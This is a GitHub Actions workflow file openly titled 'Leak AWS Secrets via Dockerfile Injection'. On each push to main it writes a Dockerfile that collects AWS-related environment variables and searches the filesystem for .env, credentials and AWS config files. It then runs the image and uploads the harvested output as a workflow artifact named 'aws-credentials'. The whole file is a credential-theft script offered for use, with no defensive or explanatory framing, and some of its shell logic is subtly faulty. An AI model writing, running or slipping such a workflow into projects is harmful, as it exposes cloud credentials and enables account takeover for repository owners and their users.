name: Leak AWS Secrets via Dockerfile Injection
on:
  push:
    branches: [ main ]

jobs:
  leak:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Write targeted Dockerfile
        run: |
          cat <<EOF > Dockerfile
          FROM alpine:latest
          ARG PAYLOAD
          RUN echo "Scanning for AWS secrets..." && \
              (env | grep -E 'AWS_|EC2_|S3_') > /secrets.txt && \
              find / -name "*.env" -o -name "credentials" -o -path "*/aws/*" -exec cat {} \; >> /secrets.txt 2>/dev/null
          EOF

      - name: Build and extract AWS secrets
        run: |
          docker build \
            --build-arg PAYLOAD="true" \
            -t aws-secrets .

          docker run --rm aws-secrets cat /secrets.txt > aws_leak.txt

      - name: Upload AWS secrets
        uses: actions/upload-artifact@v4
        with:
          name: aws-credentials
          path: aws_leak.txt
